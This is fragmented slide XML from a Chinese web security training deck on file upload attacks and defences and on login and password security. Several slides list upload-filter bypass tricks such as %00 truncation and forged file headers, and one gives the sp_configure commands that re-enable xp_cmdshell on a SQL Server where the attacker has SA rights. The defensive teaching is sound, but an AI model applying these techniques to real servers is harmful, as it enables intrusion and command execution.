                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="37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371"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="371"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="372" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="371" grpId="3"/>
    </p:bldLst>
  </p:timing>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522286" y="720724"/>
            <a:ext cx="519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atin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>常见的突破上传的办法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="Shape 375"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1746250" y="2305049"/>
            <a:ext cx="4792155" cy="375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latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>1、Filepath漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="3000">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>2、%00截断</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="3000">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>3、filetype</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="3000">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>4、文件头、文件类型漏洞	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="3000">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>5、文件解析漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="3000">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>6、经典编辑器类上传漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:defRPr sz="3000">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>… …</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4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">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375"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="blinds(vertical)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="12"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2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="374" grpId="1"/>
    </p:bldLst>
  </p:timing>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652462" y="3290886"/>
            <a:ext cx="7429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绕过解析上传文件的文件头的方法：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378" name="Shape 378"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1135061" y="4233067"/>
            <a:ext cx="11117265"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在正常的情况下，通过判断前十个字节，就能够判断出一个文件的真实类型，为了绕过这个，常用的攻击技巧是伪造一个合法的文件头，而将真实的php等脚本放在合法的文件头后。但此时仍然需要通过php来解释此文件才行。</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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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8" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="377"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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2166713" y="1112836"/>
            <a:ext cx="935876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3.获取系统权限（ASP.NET+MSSQL 20005）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="image3.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2909092" y="3515778"/>
            <a:ext cx="6527802" cy="2514602"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Shape 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908691" y="6611936"/>
            <a:ext cx="62106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进入sql shell恢复xp_cmdshell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Shape 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="997845" y="2314308"/>
            <a:ext cx="603229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获取数据库及用户(发现是SA)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Shape 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2984093" y="7676096"/>
            <a:ext cx="7036613"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Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>exec sp_configure 'show advanced options', 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2400">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>RECONFIGURE;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2400">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>exec sp_configure 'Ad Hoc Distributed Queries’,1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2400">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>RECONFIGURE; </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53"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="blinds(vertical)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1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el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="56"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13"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54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="10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4" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="22" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="10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57"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="10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 grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="53" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="54" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="56" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="55" grpId="4"/>
    </p:bldLst>
  </p:timing>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5073650" y="357980"/>
            <a:ext cx="28575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上传漏洞防范</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="381" name="Shape 381"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="519111" y="1346992"/>
            <a:ext cx="11966578"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latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>1.文件上传的目录设置为不可执行</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>只要web容器无法解析该目录下的文件，即使攻击者上传了脚本，服务器本身也不会受到影响。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>2.判断文件类型</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>在判断文件类型时，可以结合使用MIME Type,后缀检查的方式。对于图片的处理可以使用压缩函数破坏可能存在的脚本。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382" name="Shape 382"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="484980" y="5003005"/>
            <a:ext cx="12034840"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latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>3.使用随机数改写文件名和文件路径</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>文件上传如果要执行代码，则需要用户能够访问到这个文件，该写后将极大的增加攻击成本，并且shell.php.rar这些会因为被改写为无法攻击成功。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>4.单独设置文件服务器的域名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>由于浏览器的同源策略，一系列的客户端攻击将失效。</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0"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="10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381"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="blinds(vertical)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38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382"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="blinds(vertical)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="17"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 grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="380" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="382" grpId="3"/>
    </p:bldLst>
  </p:timing>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登陆安全隐患及防范</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Shape 385"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="476249" y="3817142"/>
            <a:ext cx="12050715"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密码是最常见的一种登陆的认证手段，持有正确密码的人被认为是可信的。互联网都普遍以密码作为最基础的认证手段。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="Shape 386"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493711" y="5878511"/>
            <a:ext cx="12015790"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密码强度是设计密码认证的第一个要考虑的问题。我们分为两个部分来看。</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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1452562" y="1204118"/>
            <a:ext cx="9969704" cy="2552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密码长度：</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普通应用要求长度为6位以上；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>重要应用要求长度为8位以上，并考虑双因素认证</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="389" name="image44.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2100261" y="3971925"/>
            <a:ext cx="8801102" cy="2832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8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="10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389"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="800" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="389"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="800" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="389" grpId="2"/>
    </p:bldLst>
  </p:timing>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1341436" y="2329656"/>
            <a:ext cx="10320340" cy="5092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latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>密码复杂度：</a:t>
            </a:r>
          </a:p>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密码区分大小写字母；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>密码为大写字母，小写字母，数字，特殊符号中两种组合以上；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>不要有连续性的字符，比如1234abcd，这种顺着人的思路，容易猜解；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>尽量避免出现重复的字符，如111111；</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91"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7"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1"/>
    </p:bldLst>
  </p:timing>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1087437" y="1274761"/>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多因素认证</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="Shape 394"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1054099" y="2105817"/>
            <a:ext cx="11837990" cy="32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对于很多重要的系统，只有密码作为唯一的认证手段，从安全上看会略显不足，为了增加安全性，大多数网上银行等都使用多因素认证。例如支付宝。除了支付密码之外，手机动态口令，数字证书，宝令，支付盾，第三方证书都可用于用户的认证。使登陆更加安全。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="395" name="image45.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2151061" y="5476875"/>
            <a:ext cx="8699502" cy="3022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93"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1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94"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="39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395"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="700" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="395"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="700" fill="hold"/>
                                        <p:tgtEl>
